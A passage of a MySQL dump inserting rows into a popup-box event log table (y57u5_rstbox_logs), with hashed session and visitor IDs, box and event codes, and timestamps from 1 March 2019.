(63583, 'ccd9a71170ee85d9b1ccd0be215a18e9', '70df5ba7bd3f1512', 0, 2, 1, '2019-03-01 17:57:25'),
(63584, '9f7db2fcb7f8d9900828ffaab50003aa', 'c7d4ce8b0de12339', 0, 2, 1, '2019-03-01 17:57:51'),
(63585, 'ccd9a71170ee85d9b1ccd0be215a18e9', '70df5ba7bd3f1512', 0, 2, 1, '2019-03-01 17:57:55'),
(63586, 'ccd9a71170ee85d9b1ccd0be215a18e9', '70df5ba7bd3f1512', 0, 2, 1, '2019-03-01 17:58:31'),
(63587, 'c1a04535a3aedefa5f884ffb32634974', 'a241b97c40d2b2c5', 0, 2, 1, '2019-03-01 17:58:59'),
(63588, 'ccd9a71170ee85d9b1ccd0be215a18e9', '70df5ba7bd3f1512', 0, 2, 1, '2019-03-01 17:59:30'),
(63589, '9f7db2fcb7f8d9900828ffaab50003aa', 'c7d4ce8b0de12339', 0, 2, 1, '2019-03-01 17:59:37'),
(63590, 'bae2a250645cd99202e1b957c6695224', '96cfbd74953ab001', 0, 2, 1, '2019-03-01 18:00:20'),
(63591, 'a41694b0cd2976d4eb4c7aa57d85f59e', '3093316bf8c65b3e', 0, 2, 1, '2019-03-01 18:01:32'),
(63592, '615d9bf58bf1900ad0ca9ac7732f89d4', 'd70c8b71a762e1cd', 0, 2, 1, '2019-03-01 18:01:34'),
(63593, '63f947d951d13c845af416667cfe597c', '32d0a21ed89192dd', 0, 2, 1, '2019-03-01 18:01:55'),
(63594, '615d9bf58bf1900ad0ca9ac7732f89d4', 'd70c8b71a762e1cd', 0, 2, 1, '2019-03-01 18:01:58'),
(63595, 'f96a616903a3e3fd9c1f4258684832c6', '49e02d957cfd6b0b', 0, 2, 1, '2019-03-01 18:02:04'),
(63596, '18eb0541cf5334430e4d2835c27d5205', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-01 18:02:05'),
(63597, 'd37a26998a37164dd2b53963d8c0ffa9', '16c6e644e9ca392e', 0, 2, 1, '2019-03-01 18:02:14'),
(63598, '63f947d951d13c845af416667cfe597c', '32d0a21ed89192dd', 0, 2, 1, '2019-03-01 18:02:22'),
(63599, 'c1a04535a3aedefa5f884ffb32634974', 'a241b97c40d2b2c5', 0, 2, 1, '2019-03-01 18:02:29'),
(63600, 'd37a26998a37164dd2b53963d8c0ffa9', '16c6e644e9ca392e', 0, 2, 1, '2019-03-01 18:02:56'),
(63601, 'f96a616903a3e3fd9c1f4258684832c6', '49e02d957cfd6b0b', 0, 2, 1, '2019-03-01 18:02:57'),
(63602, '64c4cb52815b5c78fb48a78614370fec', '14d059e5da6bdba4', 0, 2, 1, '2019-03-01 18:02:58'),
(63603, '63f947d951d13c845af416667cfe597c', '32d0a21ed89192dd', 0, 2, 1, '2019-03-01 18:03:05'),
(63604, '48826b89f9a33e38ebc4a252a868ae72', '91d21119de46096c', 0, 2, 1, '2019-03-01 18:03:15'),
(63605, '475fe47abd24c585716cfcba940ac604', 'aec5c02750bee636', 0, 2, 1, '2019-03-01 18:03:19'),
(63606, '216c53447ec324203fc775a2d8503c4a', '6a22e364b2dd455c', 0, 2, 1, '2019-03-01 18:03:23'),
(63607, 'c1a04535a3aedefa5f884ffb32634974', 'a241b97c40d2b2c5', 0, 2, 1, '2019-03-01 18:03:24'),
(63608, 'ce2affdd68534a528ee2e80483df1291', '792b65fe85ee5963', 0, 2, 1, '2019-03-01 18:03:25'),
(63609, '91fbb26a7538919451cbd5ad7254647f', 'b250c4bde35c1eef', 0, 2, 1, '2019-03-01 18:03:33'),
(63610, '475fe47abd24c585716cfcba940ac604', 'aec5c02750bee636', 0, 2, 1, '2019-03-01 18:03:37'),
(63611, '48826b89f9a33e38ebc4a252a868ae72', '91d21119de46096c', 0, 2, 1, '2019-03-01 18:03:44'),
(63612, '445431e83941fd362a52bbbde1571f4c', 'ed8fddef90c77d16', 0, 2, 1, '2019-03-01 18:03:48'),
(63613, '64c4cb52815b5c78fb48a78614370fec', '14d059e5da6bdba4', 0, 2, 1, '2019-03-01 18:03:54'),
(63614, '445431e83941fd362a52bbbde1571f4c', 'ed8fddef90c77d16', 0, 2, 1, '2019-03-01 18:04:11'),
(63615, 'c4cbcc31ca43bd56dbb21ec5c7fa3792', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-01 18:04:26'),
(63616, '63f947d951d13c845af416667cfe597c', '32d0a21ed89192dd', 0, 2, 1, '2019-03-01 18:04:38'),
(63617, '63f947d951d13c845af416667cfe597c', '32d0a21ed89192dd', 0, 2, 1, '2019-03-01 18:04:43'),
(63618, 'c4cbcc31ca43bd56dbb21ec5c7fa3792', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-01 18:04:49'),
(63619, '46ea5905c34d16d689548e8e991c50b7', '2034f09284a4c7ca', 0, 2, 1, '2019-03-01 18:05:03'),
(63620, '4685773fbfd33b02a6c9e355a15c343c', '644e3fbd7f702842', 0, 2, 1, '2019-03-01 18:05:11'),
(63621, 'c4cbcc31ca43bd56dbb21ec5c7fa3792', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-01 18:05:20'),
(63622, '3833694e0283e2531514cac0694487b6', 'ef0ca87bfaada93e', 0, 2, 1, '2019-03-01 18:05:26'),
(63623, '46ea5905c34d16d689548e8e991c50b7', '2034f09284a4c7ca', 0, 2, 1, '2019-03-01 18:05:27'),
(63624, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:06:03'),
(63625, '3833694e0283e2531514cac0694487b6', 'ef0ca87bfaada93e', 0, 2, 1, '2019-03-01 18:06:09'),
(63626, 'c4cbcc31ca43bd56dbb21ec5c7fa3792', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-01 18:06:27'),
(63627, 'c4cbcc31ca43bd56dbb21ec5c7fa3792', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-01 18:06:33'),
(63628, '9910b6e6106ec22ad880b3a617bcca9d', '65e1b73cf3be5c3f', 0, 2, 1, '2019-03-01 18:06:34'),
(63629, '9910b6e6106ec22ad880b3a617bcca9d', '65e1b73cf3be5c3f', 0, 2, 1, '2019-03-01 18:07:02'),
(63630, 'c4cbcc31ca43bd56dbb21ec5c7fa3792', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-01 18:07:03'),
(63631, '4685773fbfd33b02a6c9e355a15c343c', '644e3fbd7f702842', 0, 2, 1, '2019-03-01 18:07:03'),
(63632, '22470c436288f746a077ab6eaa24b5ca', 'e2b3fae8bfe73d6e', 0, 2, 1, '2019-03-01 18:07:09'),
(63633, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:07:34'),
(63634, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:08:00'),
(63635, 'c79efbd45dcc58f0db1de30cb56b0e20', '2956fd1c8bef6f2e', 0, 2, 1, '2019-03-01 18:08:09'),
(63636, 'c4cbcc31ca43bd56dbb21ec5c7fa3792', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-01 18:08:22'),
(63637, '3a5e0d46e0cf8c34476a2ed7118559a6', '53b935b390135685', 0, 2, 1, '2019-03-01 18:08:25'),
(63638, '01fdfec5a2545e60a1623b8f516aef8d', 'ee957afb7652426c', 0, 2, 1, '2019-03-01 18:08:32'),
(63639, 'c4cbcc31ca43bd56dbb21ec5c7fa3792', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-01 18:09:01'),
(63640, 'c79efbd45dcc58f0db1de30cb56b0e20', '2956fd1c8bef6f2e', 0, 2, 1, '2019-03-01 18:09:04'),
(63641, '01fdfec5a2545e60a1623b8f516aef8d', 'ee957afb7652426c', 0, 2, 1, '2019-03-01 18:09:07'),
(63642, '9f9e822875e737013b0f96d5bd3e7fd1', 'd6b9cd5bfdd27ced', 0, 2, 1, '2019-03-01 18:09:16'),
(63643, '9f9e822875e737013b0f96d5bd3e7fd1', 'd6b9cd5bfdd27ced', 0, 2, 1, '2019-03-01 18:09:19'),
(63644, '3a5e0d46e0cf8c34476a2ed7118559a6', '53b935b390135685', 0, 2, 1, '2019-03-01 18:09:25'),
(63645, 'c4cbcc31ca43bd56dbb21ec5c7fa3792', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-01 18:09:26'),
(63646, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:10:04'),
(63647, '9f9e822875e737013b0f96d5bd3e7fd1', 'd6b9cd5bfdd27ced', 0, 2, 1, '2019-03-01 18:10:07'),
(63648, 'c4cbcc31ca43bd56dbb21ec5c7fa3792', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-01 18:10:17'),
(63649, 'c4cbcc31ca43bd56dbb21ec5c7fa3792', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-01 18:10:35'),
(63650, 'c4cbcc31ca43bd56dbb21ec5c7fa3792', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-01 18:10:58'),
(63651, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:11:26'),
(63652, 'a2f841fffc87b27cd36eeab5ae90f7d1', '84c73015e9e28e8a', 0, 2, 1, '2019-03-01 18:11:42'),
(63653, '4d6638a724cc31eb628311eb455cc195', 'df33e8ddb6d90cc4', 0, 2, 1, '2019-03-01 18:11:48'),
(63654, 'cdf785eeb3eeda6012a612cd5eb382d3', 'ed7a9749e0689b64', 0, 2, 1, '2019-03-01 18:11:52'),
(63655, 'c4cbcc31ca43bd56dbb21ec5c7fa3792', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-01 18:11:59'),
(63656, 'cdf785eeb3eeda6012a612cd5eb382d3', 'ed7a9749e0689b64', 0, 2, 1, '2019-03-01 18:12:18'),
(63657, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:12:31'),
(63658, '22470c436288f746a077ab6eaa24b5ca', 'e2b3fae8bfe73d6e', 0, 2, 1, '2019-03-01 18:12:56'),
(63659, 'cdf785eeb3eeda6012a612cd5eb382d3', 'ed7a9749e0689b64', 0, 2, 1, '2019-03-01 18:12:59'),
(63660, '3a5e0d46e0cf8c34476a2ed7118559a6', '53b935b390135685', 0, 2, 1, '2019-03-01 18:13:00'),
(63661, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:13:05'),
(63662, 'a2f841fffc87b27cd36eeab5ae90f7d1', '84c73015e9e28e8a', 0, 2, 1, '2019-03-01 18:13:08'),
(63663, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:13:26'),
(63664, '601ffa15ec2b9c17a967cea3cb45b59a', '471e356b82ae8f37', 0, 2, 1, '2019-03-01 18:13:33'),
(63665, '52fe0271cca27038a7ce776d031bf0fb', '3de88ff4581dab27', 0, 2, 1, '2019-03-01 18:13:58'),
(63666, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:14:25'),
(63667, '52fe0271cca27038a7ce776d031bf0fb', '3de88ff4581dab27', 0, 2, 1, '2019-03-01 18:14:26'),
(63668, '3a5e0d46e0cf8c34476a2ed7118559a6', '53b935b390135685', 0, 2, 1, '2019-03-01 18:14:27'),
(63669, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:14:35'),
(63670, '332b2d5995b204306ac7ac7bcc621089', '9a903552e28cf43c', 0, 2, 1, '2019-03-01 18:14:36'),
(63671, '3a5e0d46e0cf8c34476a2ed7118559a6', '53b935b390135685', 0, 2, 1, '2019-03-01 18:14:43'),
(63672, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:14:43'),
(63673, '332b2d5995b204306ac7ac7bcc621089', '9a903552e28cf43c', 0, 2, 1, '2019-03-01 18:15:16'),
(63674, '64c4cb52815b5c78fb48a78614370fec', '14d059e5da6bdba4', 0, 2, 1, '2019-03-01 18:15:22'),
(63675, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:15:52'),
(63676, '64c4cb52815b5c78fb48a78614370fec', '14d059e5da6bdba4', 0, 2, 1, '2019-03-01 18:16:03'),
(63677, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:16:24'),
(63678, '218e7617808d8f6fc005ccdeeb714d7a', '644acf1110495d92', 0, 2, 1, '2019-03-01 18:16:37'),
(63679, 'd7b9e49ceaee15818415befbddf93707', 'd7c14cfa379ac614', 0, 2, 1, '2019-03-01 18:17:00'),
(63680, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:17:15'),
(63681, 'c4cbcc31ca43bd56dbb21ec5c7fa3792', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-01 18:17:57'),
(63682, 'd7b9e49ceaee15818415befbddf93707', 'd7c14cfa379ac614', 0, 2, 1, '2019-03-01 18:18:01'),
(63683, '3a5e0d46e0cf8c34476a2ed7118559a6', '53b935b390135685', 0, 2, 1, '2019-03-01 18:18:02'),
(63684, 'b80b92566bd5030b488b50ce7473810c', '4d1362fba404de77', 0, 2, 1, '2019-03-01 18:18:12'),
(63685, 'c4cbcc31ca43bd56dbb21ec5c7fa3792', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-01 18:18:40'),
(63686, '3ebf347806c344606726b073918bb1ec', 'f35451633a143113', 0, 2, 1, '2019-03-01 18:18:41'),
(63687, 'c7ab8729c7e6a4db311472f245f43913', '15af9890c74b186c', 0, 2, 1, '2019-03-01 18:18:42'),
(63688, '2f046578aa7ffabf7d192e0c34c0bd17', '29ef45db200a8f59', 0, 2, 1, '2019-03-01 18:18:44'),
(63689, '22470c436288f746a077ab6eaa24b5ca', 'e2b3fae8bfe73d6e', 0, 2, 1, '2019-03-01 18:18:45'),
(63690, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:18:59'),
(63691, '3ebf347806c344606726b073918bb1ec', 'f35451633a143113', 0, 2, 1, '2019-03-01 18:18:59'),
(63692, 'c4cbcc31ca43bd56dbb21ec5c7fa3792', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-01 18:19:01'),
(63693, '52fe0271cca27038a7ce776d031bf0fb', '3de88ff4581dab27', 0, 2, 1, '2019-03-01 18:19:02'),
(63694, '3a5e0d46e0cf8c34476a2ed7118559a6', '53b935b390135685', 0, 2, 1, '2019-03-01 18:19:08'),
(63695, '3ebf347806c344606726b073918bb1ec', 'f35451633a143113', 0, 2, 1, '2019-03-01 18:19:30'),
(63696, '64c4cb52815b5c78fb48a78614370fec', '14d059e5da6bdba4', 0, 2, 1, '2019-03-01 18:19:57'),
(63697, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:20:01'),
(63698, '64c4cb52815b5c78fb48a78614370fec', '14d059e5da6bdba4', 0, 2, 1, '2019-03-01 18:20:05'),
(63699, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:20:32'),
(63700, '9910b6e6106ec22ad880b3a617bcca9d', '65e1b73cf3be5c3f', 0, 2, 1, '2019-03-01 18:20:43'),
(63701, 'a316705810b033ce0f5b910c77918be4', '1de090ec808c88cc', 0, 2, 1, '2019-03-01 18:20:48'),
(63702, 'a95b6b7170a5f8fcdfae23a6df7bd806', 'df27b9a2919a8206', 0, 2, 1, '2019-03-01 18:20:54'),
(63703, 'c4cbcc31ca43bd56dbb21ec5c7fa3792', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-01 18:20:55'),
(63704, '4ab169d3a6582f6b0f56c9942e15684b', 'e3163f1046dc4449', 0, 2, 1, '2019-03-01 18:21:01'),
(63705, '332b2d5995b204306ac7ac7bcc621089', '9a903552e28cf43c', 0, 2, 1, '2019-03-01 18:21:10'),
(63706, '601ffa15ec2b9c17a967cea3cb45b59a', '471e356b82ae8f37', 0, 2, 1, '2019-03-01 18:21:16'),
(63707, '9910b6e6106ec22ad880b3a617bcca9d', '65e1b73cf3be5c3f', 0, 2, 1, '2019-03-01 18:21:21'),
(63708, 'c7ab8729c7e6a4db311472f245f43913', '15af9890c74b186c', 0, 2, 1, '2019-03-01 18:21:25'),
(63709, '5fa4dae2c51ba4989968304111f34685', 'd50d7502174878db', 0, 2, 1, '2019-03-01 18:21:26'),
(63710, '5fa4dae2c51ba4989968304111f34685', 'd50d7502174878db', 0, 2, 1, '2019-03-01 18:21:43'),
(63711, 'c79efbd45dcc58f0db1de30cb56b0e20', '2956fd1c8bef6f2e', 0, 2, 1, '2019-03-01 18:21:45'),
(63712, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:22:01'),
(63713, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:22:26'),
(63714, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:22:52'),
(63715, '53a87a147729e6508f62f38c4a495978', '7b16863d40230e2a', 0, 2, 1, '2019-03-01 18:23:10'),
(63716, '3345c8691bd05da3f958675e4505c40b', 'a7a7b4bbea82be21', 0, 2, 1, '2019-03-01 18:23:23'),
(63717, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:23:37'),
(63718, 'c7ab8729c7e6a4db311472f245f43913', '15af9890c74b186c', 0, 2, 1, '2019-03-01 18:23:38'),
(63719, 'b80b92566bd5030b488b50ce7473810c', '4d1362fba404de77', 0, 2, 1, '2019-03-01 18:23:41'),
(63720, '3345c8691bd05da3f958675e4505c40b', 'a7a7b4bbea82be21', 0, 2, 1, '2019-03-01 18:23:58'),
(63721, '7f5a302ed99b6d140b0bfaf800096f98', 'a563f0e96a08ad35', 0, 2, 1, '2019-03-01 18:23:58'),
(63722, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:24:14'),
(63723, '8b2a75e139306cdb58bca1a51e65e27e', '68e262710bf07c1c', 0, 2, 1, '2019-03-01 18:24:16'),
(63724, '7f5a302ed99b6d140b0bfaf800096f98', 'a563f0e96a08ad35', 0, 2, 1, '2019-03-01 18:24:33'),
(63725, '429da8a7ffbfb761eac516ce1a5eafc7', 'f59438e8eed41d1b', 0, 2, 1, '2019-03-01 18:24:43'),
(63726, '615d9bf58bf1900ad0ca9ac7732f89d4', 'd70c8b71a762e1cd', 0, 2, 1, '2019-03-01 18:25:02'),
(63727, '8b2a75e139306cdb58bca1a51e65e27e', '68e262710bf07c1c', 0, 2, 1, '2019-03-01 18:25:08'),
(63728, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:25:14'),
(63729, '601ffa15ec2b9c17a967cea3cb45b59a', '471e356b82ae8f37', 0, 2, 1, '2019-03-01 18:25:24'),
(63730, 'a95b6b7170a5f8fcdfae23a6df7bd806', 'df27b9a2919a8206', 0, 2, 1, '2019-03-01 18:25:31'),
(63731, 'd3f3ec7750b6f3c9cfb0d5c7666920c1', 'fdf9ebf40cfff953', 0, 2, 1, '2019-03-01 18:25:33'),
(63732, 'd3f3ec7750b6f3c9cfb0d5c7666920c1', 'fdf9ebf40cfff953', 0, 2, 1, '2019-03-01 18:25:44'),
(63733, '7f5a302ed99b6d140b0bfaf800096f98', 'a563f0e96a08ad35', 0, 2, 1, '2019-03-01 18:26:33'),
(63734, '429da8a7ffbfb761eac516ce1a5eafc7', 'f59438e8eed41d1b', 0, 2, 1, '2019-03-01 18:26:38'),
(63735, '8b2a75e139306cdb58bca1a51e65e27e', '68e262710bf07c1c', 0, 2, 1, '2019-03-01 18:26:40'),
(63736, '01fdfec5a2545e60a1623b8f516aef8d', 'ee957afb7652426c', 0, 2, 1, '2019-03-01 18:26:44'),
(63737, '429da8a7ffbfb761eac516ce1a5eafc7', 'f59438e8eed41d1b', 0, 2, 1, '2019-03-01 18:27:05'),
(63738, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:27:41'),
(63739, 'ce2affdd68534a528ee2e80483df1291', '792b65fe85ee5963', 0, 2, 1, '2019-03-01 18:27:45'),
(63740, 'ce2affdd68534a528ee2e80483df1291', '792b65fe85ee5963', 0, 2, 1, '2019-03-01 18:27:58'),
(63741, '049ff4b8e3068e39c6244e2a770c520c', 'e04aa6f074175862', 0, 2, 1, '2019-03-01 18:28:04'),
(63742, '538dde011858272ce5ae5273bcb7cb0a', '6fe56a3cd549b6ed', 0, 2, 1, '2019-03-01 18:28:21'),
(63743, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:28:22'),
(63744, '049ff4b8e3068e39c6244e2a770c520c', 'e04aa6f074175862', 0, 2, 1, '2019-03-01 18:28:34'),
(63745, '64c4cb52815b5c78fb48a78614370fec', '14d059e5da6bdba4', 0, 2, 1, '2019-03-01 18:28:43'),
(63746, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:28:54'),
(63747, '601ffa15ec2b9c17a967cea3cb45b59a', '471e356b82ae8f37', 0, 2, 1, '2019-03-01 18:29:08'),
(63748, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:29:16'),
(63749, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:29:35'),
(63750, '538dde011858272ce5ae5273bcb7cb0a', '6fe56a3cd549b6ed', 0, 2, 1, '2019-03-01 18:29:36'),
(63751, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:29:52'),
(63752, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:30:35');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(63753, '3a5e0d46e0cf8c34476a2ed7118559a6', '53b935b390135685', 0, 2, 1, '2019-03-01 18:31:36'),
(63754, '8b2a75e139306cdb58bca1a51e65e27e', '68e262710bf07c1c', 0, 2, 1, '2019-03-01 18:31:39'),
(63755, '63f947d951d13c845af416667cfe597c', '32d0a21ed89192dd', 0, 2, 1, '2019-03-01 18:31:49'),
(63756, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:31:52'),
(63757, 'b80b92566bd5030b488b50ce7473810c', '4d1362fba404de77', 0, 2, 1, '2019-03-01 18:32:31'),
(63758, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:32:33'),
(63759, 'a9b1c3c84810f22c88f03a39f122c9f3', '1b466b565be60765', 0, 2, 1, '2019-03-01 18:32:34'),
(63760, '0b7322e42f0252fda7d49d820cb60ab0', 'c2e31d5eca19b0b6', 0, 2, 1, '2019-03-01 18:33:08'),
(63761, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:33:09'),
(63762, 'a9b1c3c84810f22c88f03a39f122c9f3', '1b466b565be60765', 0, 2, 1, '2019-03-01 18:33:15'),
(63763, '63f947d951d13c845af416667cfe597c', '32d0a21ed89192dd', 0, 2, 1, '2019-03-01 18:33:17'),
(63764, 'cdf785eeb3eeda6012a612cd5eb382d3', 'ed7a9749e0689b64', 0, 2, 1, '2019-03-01 18:33:22'),
(63765, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:33:37'),
(63766, '0b7322e42f0252fda7d49d820cb60ab0', 'c2e31d5eca19b0b6', 0, 2, 1, '2019-03-01 18:33:50'),
(63767, '37b6818c7dbb8b58891422d08679c270', '1050858b5c90cf2f', 0, 2, 1, '2019-03-01 18:34:15'),
(63768, '0b7322e42f0252fda7d49d820cb60ab0', 'c2e31d5eca19b0b6', 0, 2, 1, '2019-03-01 18:34:22'),
(63769, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:35:07'),
(63770, 'c9c2046bf999ab2c5f6a0bebdec4fbfe', 'd5a8ce141a3147a2', 0, 2, 1, '2019-03-01 18:35:37'),
(63771, '37b6818c7dbb8b58891422d08679c270', '1050858b5c90cf2f', 0, 2, 1, '2019-03-01 18:35:51'),
(63772, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:36:08'),
(63773, '37b6818c7dbb8b58891422d08679c270', '1050858b5c90cf2f', 0, 2, 1, '2019-03-01 18:36:23'),
(63774, 'e7d217987a14ec55aabda39bb58d5a2a', '5e5a1dbcfcc938e1', 0, 2, 1, '2019-03-01 18:36:23'),
(63775, '27a83753fddb83b5a8e6a9a64545b664', 'a811f042baa8c816', 0, 2, 1, '2019-03-01 18:36:30'),
(63776, 'd3f3ec7750b6f3c9cfb0d5c7666920c1', 'fdf9ebf40cfff953', 0, 2, 1, '2019-03-01 18:36:39'),
(63777, '27a83753fddb83b5a8e6a9a64545b664', 'a811f042baa8c816', 0, 2, 1, '2019-03-01 18:36:46'),
(63778, 'c9c2046bf999ab2c5f6a0bebdec4fbfe', 'd5a8ce141a3147a2', 0, 2, 1, '2019-03-01 18:36:55'),
(63779, '0b7322e42f0252fda7d49d820cb60ab0', 'c2e31d5eca19b0b6', 0, 2, 1, '2019-03-01 18:37:00'),
(63780, 'e7d217987a14ec55aabda39bb58d5a2a', '5e5a1dbcfcc938e1', 0, 2, 1, '2019-03-01 18:37:02'),
(63781, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:37:04'),
(63782, '8e5f806f33d784ffaed6353cc1afad4a', 'dba49dcafdc2b991', 0, 2, 1, '2019-03-01 18:37:04'),
(63783, '9910b6e6106ec22ad880b3a617bcca9d', '65e1b73cf3be5c3f', 0, 2, 1, '2019-03-01 18:37:15'),
(63784, '6bca6b1fcf029da73db711445848e7b0', '3c4a917ad317985a', 0, 2, 1, '2019-03-01 18:37:20'),
(63785, 'a772281cbb692d9a4be8bdf0545a9fbe', '8ea9c7ddba1d9973', 0, 2, 1, '2019-03-01 18:37:29'),
(63786, 'd3f3ec7750b6f3c9cfb0d5c7666920c1', 'fdf9ebf40cfff953', 0, 2, 1, '2019-03-01 18:37:51'),
(63787, 'bacda1e2ae9fd8aa61041eb3917e62ac', '89303dd4b181d948', 0, 2, 1, '2019-03-01 18:37:54'),
(63788, 'a772281cbb692d9a4be8bdf0545a9fbe', '8ea9c7ddba1d9973', 0, 2, 1, '2019-03-01 18:37:55'),
(63789, '8e5f806f33d784ffaed6353cc1afad4a', 'dba49dcafdc2b991', 0, 2, 1, '2019-03-01 18:37:55'),
(63790, '601ffa15ec2b9c17a967cea3cb45b59a', '471e356b82ae8f37', 0, 2, 1, '2019-03-01 18:38:05'),
(63791, 'a41694b0cd2976d4eb4c7aa57d85f59e', '3093316bf8c65b3e', 0, 2, 1, '2019-03-01 18:38:10'),
(63792, '9f9e822875e737013b0f96d5bd3e7fd1', 'd6b9cd5bfdd27ced', 0, 2, 1, '2019-03-01 18:38:12'),
(63793, 'a95b6b7170a5f8fcdfae23a6df7bd806', 'df27b9a2919a8206', 0, 2, 1, '2019-03-01 18:38:17'),
(63794, '601ffa15ec2b9c17a967cea3cb45b59a', '471e356b82ae8f37', 0, 2, 1, '2019-03-01 18:38:23'),
(63795, '1b830b49ad4ed3eb16382de98759787e', '4aedc46c0f07f4ac', 0, 2, 1, '2019-03-01 18:38:25'),
(63796, 'd3f3ec7750b6f3c9cfb0d5c7666920c1', 'fdf9ebf40cfff953', 0, 2, 1, '2019-03-01 18:38:30'),
(63797, 'c9893075cbefdca9c6d0150b10bdafb5', '196ae7616c94df27', 0, 2, 1, '2019-03-01 18:38:31'),
(63798, '1b830b49ad4ed3eb16382de98759787e', '4aedc46c0f07f4ac', 0, 2, 1, '2019-03-01 18:38:36'),
(63799, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:38:36'),
(63800, '1b830b49ad4ed3eb16382de98759787e', '4aedc46c0f07f4ac', 0, 2, 1, '2019-03-01 18:38:40'),
(63801, '601ffa15ec2b9c17a967cea3cb45b59a', '471e356b82ae8f37', 0, 2, 1, '2019-03-01 18:38:43'),
(63802, 'a41694b0cd2976d4eb4c7aa57d85f59e', '3093316bf8c65b3e', 0, 2, 1, '2019-03-01 18:38:48'),
(63803, '6eda6657cdedbb262568959ff139920d', '0bf16c319bd2f666', 0, 2, 1, '2019-03-01 18:38:52'),
(63804, '601ffa15ec2b9c17a967cea3cb45b59a', '471e356b82ae8f37', 0, 2, 1, '2019-03-01 18:39:03'),
(63805, '2f2005974b29181ca43d810d6972a0b0', '6c6debeb11ff5a6e', 0, 2, 1, '2019-03-01 18:39:09'),
(63806, '1b830b49ad4ed3eb16382de98759787e', '4aedc46c0f07f4ac', 0, 2, 1, '2019-03-01 18:39:15'),
(63807, '1b830b49ad4ed3eb16382de98759787e', '4aedc46c0f07f4ac', 0, 2, 1, '2019-03-01 18:39:18'),
